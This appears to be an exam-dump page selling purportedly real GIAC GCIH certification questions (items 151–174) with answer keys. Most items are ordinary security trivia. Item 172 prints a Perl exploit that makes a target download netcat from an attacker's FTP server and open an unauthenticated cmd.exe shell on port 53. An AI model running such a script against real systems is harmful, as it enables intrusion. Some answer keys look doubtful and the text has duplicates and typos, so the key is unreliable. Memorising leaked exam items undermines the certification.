
Pass Your GCIH Exam Easily - Real GCIH Practice Dump Updated Dec 05, 2023
2023 Realistic Verified Free GIAC GCIH Exam Questions
GIAC GCIH certification exam is a computer-based exam that consists of 150 multiple-choice questions. The time allotted for the exam is four hours. GCIH exam is designed to test the candidate's knowledge of incident handling, threat intelligence, network security, and forensics. GCIH exam fee is $1,899, and it is available in English language only. GCIH exam can be taken either at a Pearson VUE testing center or online.
NEW QUESTION # 151
Which of the following statements are true about session hijacking?
Each correct answer represents a complete solution. Choose all that apply.
- A. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.
- B. TCP session hijacking is when a hacker takes over a TCP session between two machines.
- C. Use of a long random number or string as the session key reduces session hijacking.
- D. It is used to slow the working of victim's network resources.
Answer: A,B,C
NEW QUESTION # 152
Which of the following is used to determine the range of IP addresses that are mapped to a live hosts?
- A. IP sweep
- B. Ping sweep
- C. Port sweep
- D. Telnet sweep
Answer: B
NEW QUESTION # 153
Adam works as a Penetration Tester for Umbrella Inc. A project has been assigned to him check the security of wireless network of the company. He re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Adam assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs.
Which of the following types of attack is Adam performing?
- A. Network injection attack
- B. MAC Spoofing attack
- C. Caffe Latte attack
- D. Replay attack
Answer: D
NEW QUESTION # 154
Which of the following malicious software travels across computer networks without the assistance of a user?
- A. Virus
- B. Hoax
- C. Worm
- D. Trojan horses
Answer: C
NEW QUESTION # 155
Which of the following is used to gather information about a remote network protected by a firewall?
- A. Firewalking
- B. Firechalking
- C. Wardialing
- D. Warchalking
Answer: A
Explanation:
Section: Volume C
NEW QUESTION # 156
Adam, a malicious hacker is sniffing the network to inject ARP packets. He injects broadcast frames onto the wire to
conduct Man-in-The-Middle attack.
Which of the following is the destination MAC address of a broadcast frame?
- A. 0x00000000000
- B. 0xDDDDDDDDD
- C. 0xFFFFFFFFFFFF
- D. 0xAAAAAAAAAA
Answer: C
NEW QUESTION # 157
John works as a Network Administrator for We-are-secure Inc. He finds that TCP port 7597 of the Weare- secure server is open. He suspects that it may be open due to a Trojan installed on the server. He presents a report to the company describing the symptoms of the Trojan. A summary of the report is given below: Once this Trojan has been installed on the computer, it searches Notpad.exe, renames it Note.com, and then copies itself to the computer as Notepad.exe. Each time Notepad.exe is executed, the Trojan executes and calls the original Notepad to avoid being noticed.
Which of the following Trojans has the symptoms as the one described above?
- A. NetBus
- B. SubSeven
- C. eBlaster
- D. Qaz
Answer: D
NEW QUESTION # 158
James works as a Database Administrator for Techsoft Inc. The company has a SQL Server 2005 computer. The computer has a database named Sales. Users complain that the performance of the database has deteriorated. James opens the System Monitor tool and finds that there is an increase in network traffic. What kind of attack might be the cause of the performance deterioration?
- A. Virus
- B. Internal attack
- C. Injection
- D. Denial-of-Service
Answer: D
NEW QUESTION # 159
Firewalking is a technique that can be used to gather information about a remote network protected by a firewall. This technique can be used effectively to perform information gathering attacks. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall. Which of the following are pre-requisites for an attacker to conduct firewalking?
Each correct answer represents a complete solution. Choose all that apply.
- A. ICMP packets leaving the network should be allowed.
- B. There should be a backdoor installed on the network.
- C. An attacker should know the IP address of the last known gateway before the firewall.
- D. An attacker should know the IP address of a host located behind the firewall.
Answer: A,C,D
NEW QUESTION # 160
Victor works as a professional Ethical Hacker for SecureEnet Inc. He wants to scan the wireless network of the
company. He uses a tool that is a free open-source utility for network exploration. The tool uses raw IP packets to
determine the following:
What ports are open on our network systems.
What hosts are available on the network.
Identify unauthorized wireless access points.
What services (application name and version) those hosts are offering.
What operating systems (and OS versions) they are running.
What type of packet filters/firewalls are in use.
Which of the following tools is Victor using?
- A. Sniffer
- B. Kismet
- C. Nessus
- D. Nmap
Answer: D
NEW QUESTION # 161
Jason, a Malicious Hacker, is a student of Baker university. He wants to perform remote hacking on the server of DataSoft Inc. to hone his hacking skills. The company has a Windows-based network. Jason successfully enters the target system remotely by using the advantage of vulnerability. He places a Trojan to maintain future access and then disconnects the remote session. The employees of the company complain to Mark, who works as a Professional Ethical Hacker for DataSoft Inc., that some computers are very slow. Mark diagnoses the network and finds that some irrelevant log files and signs of Trojans are present on the computers. He suspects that a malicious hacker has accessed the network. Mark takes the help from Forensic Investigators and catches Jason.
Which of the following mistakes made by Jason helped the Forensic Investigators catch him?
- A. Jason did not perform covering tracks.
- B. Jason did not perform port scanning.
- C. Jason did not perform a vulnerability assessment.
- D. Jason did not perform foot printing.
- E. Jason did not perform OS fingerprinting.
Answer: A
Explanation:
Section: Volume A
Explanation/Reference:
NEW QUESTION # 162
Which of the following statements about Ping of Death attack is true?
- A. This type of attack uses common words in either upper or lower case to find a password.
- B. In this type of attack, a hacker sends ICMP packets greater than 65,536 bytes to crash a system.
- C. In this type of attack, a hacker maliciously cuts a network cable.
- D. In this type of attack, a hacker sends more traffic to a network address than the buffer can handle.
Answer: B
Explanation:
Section: Volume B
NEW QUESTION # 163
Which of the following statements about reconnaissance is true?
- A. It describes an attempt to transfer DNS zone data.
- B. It is a computer that is used to attract potential intruders or attackers.
- C. It is also known as half-open scanning.
- D. It is any program that allows a hacker to connect to a computer without going through the normal authentication process.
Answer: A
NEW QUESTION # 164
Which of the following Linux rootkits allows an attacker to hide files, processes, and network connections?
Each correct answer represents a complete solution. Choose all that apply.
- A. Beastkit
- B. Phalanx2
- C. Adore
- D. Knark
Answer: C,D
NEW QUESTION # 165
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-
secure.com. He finds that the We-are-secure server is vulnerable to attacks. As a countermeasure, he suggests that
the Network Administrator should remove the IPP printing capability from the server. He is suggesting this as a
countermeasure against __________.
- A. DNS zone transfer
- B. SNMP enumeration
- C. NetBIOS NULL session
- D. IIS buffer overflow
Answer: D
NEW QUESTION # 166
Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealth at this point.
Which of the following type of scans would be most accurate and reliable?
- A. UDP sacn
- B. Fin scan
- C. ACK scan
- D. TCP Connect scan
Answer: D
Explanation:
Section: Volume A
NEW QUESTION # 167
John works as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. The company is aware of various types of security attacks and wants to impede them. Hence, management has assigned John a project to port scan the company's Web Server. For this, he uses the nmap port scanner and issues the following command to perform idle port scanning:
nmap -PN -p- -sI IP_Address_of_Company_Server
He analyzes that the server's TCP ports 21, 25, 80, and 111 are open.
Which of the following security policies is the company using during this entire process to mitigate the risk of hacking attacks?
- A. Acceptable use policy
- B. Audit policy
- C. Non-disclosure agreement
- D. Antivirus policy
Answer: B
NEW QUESTION # 168
You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws?
- A. Manual penetration testing
- B. Automated penetration testing
- C. Vulnerability scanning
- D. Code review
Answer: C
NEW QUESTION # 169
You run the following bash script in Linux:
for i in 'cat hostlist.txt' ;do
nc -q 2 -v $i 80 < request.txt done
Where, hostlist.txt file contains the list of IP addresses and request.txt is the output file. Which of the following tasks do you want to perform by running this script?
- A. You want to perform port scanning to the hosts given in the IP address list.
- B. You want to perform banner grabbing to the hosts given in the IP address list.
- C. You want to transfer file hostlist.txt to the hosts given in the IP address list.
- D. You want to put nmap in the listen mode to the hosts given in the IP address list.
Answer: B
Explanation:
Section: Volume A
NEW QUESTION # 170
Which of the following scanning tools is also a network analysis tool that sends packets with nontraditional IP stack parameters and allows the scanner to gather information from the response packets generated?
- A. Legion
- B. Nessus
- C. HPing
- D. Tcpview
Answer: C
NEW QUESTION # 171
John works as a Network Administrator for We-are-secure Inc. He finds that TCP port 7597 of the Weare- secure server is open. He suspects that it may be open due to a Trojan installed on the server. He presents a report to the company describing the symptoms of the Trojan. A summary of the report is given below:
Once this Trojan has been installed on the computer, it searches Notpad.exe, renames it Note.com, and then copies itself to the computer as Notepad.exe. Each time Notepad.exe is executed, the Trojan executes and calls the original Notepad to avoid being noticed.
Which of the following Trojans has the symptoms as the one described above?
- A. NetBus
- B. SubSeven
- C. eBlaster
- D. Qaz
Answer: D
Explanation:
Section: Volume C
NEW QUESTION # 172
Adam, a malicious hacker performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -
h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get hacked. html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port");
exit(0);
Which of the following is the expected result of the above exploit?
- A. Creates a share called "sasfile" on the target system
- B. Opens up a telnet listener that requires no username or password
- C. Creates an FTP server with write permissions enabled
- D. Opens up a SMTP server that requires no username or password
Answer: B
NEW QUESTION # 173
Which of the following is a reason to implement security logging on a DNS server?
- A. For measuring a DNS server's performance
- B. For preventing malware attacks on a DNS server
- C. For recording the number of queries resolved
- D. For monitoring unauthorized zone transfer
Answer: D
NEW QUESTION # 174
......
GCIH Real Exam Questions and Answers FREE: https://www.actualtorrent.com/GCIH-questions-answers.html
GCIH Exam Questions | Real GCIH Practice Dumps: https://drive.google.com/open?id=1JVNVhupUIOmYjhK6YIujNMovgZe4ZCeO